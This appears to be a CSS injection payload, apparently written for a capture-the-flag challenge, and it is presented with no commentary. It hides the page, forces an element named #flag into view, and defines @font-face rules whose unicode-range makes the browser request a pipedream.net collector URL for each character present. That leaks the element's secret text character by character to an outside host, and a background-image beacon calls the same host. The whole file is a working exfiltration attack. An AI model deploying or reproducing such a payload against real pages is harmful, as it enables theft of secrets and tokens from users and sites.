body{background-image:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=W22')}
#page{content-visibility:hidden;animation:unveil 0.001s 0.3s forwards}
@keyframes unveil{to{content-visibility:visible}}
#flag{display:block!important}
#flag{font-family:p97w22,p98w22,p106w22,p112w22,p115w22,p121w22,p122w22,p48w22,p49w22,p52w22,p53w22,p55w22,p125w22,monospace;width:22ch;white-space:pre-wrap;word-break:break-all;overflow:visible}
#flag::first-line{font-family:monospace!important}
@font-face{font-family:p97w22;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=a_W22');unicode-range:U+0061}
@font-face{font-family:p98w22;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=b_W22');unicode-range:U+0062}
@font-face{font-family:p106w22;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=j_W22');unicode-range:U+006A}
@font-face{font-family:p112w22;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=p_W22');unicode-range:U+0070}
@font-face{font-family:p115w22;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=s_W22');unicode-range:U+0073}
@font-face{font-family:p121w22;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=y_W22');unicode-range:U+0079}
@font-face{font-family:p122w22;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=z_W22');unicode-range:U+007A}
@font-face{font-family:p48w22;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=0_W22');unicode-range:U+0030}
@font-face{font-family:p49w22;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=1_W22');unicode-range:U+0031}
@font-face{font-family:p52w22;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=4_W22');unicode-range:U+0034}
@font-face{font-family:p53w22;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=5_W22');unicode-range:U+0035}
@font-face{font-family:p55w22;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=7_W22');unicode-range:U+0037}
@font-face{font-family:p125w22;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=%7D_W22');unicode-range:U+007D}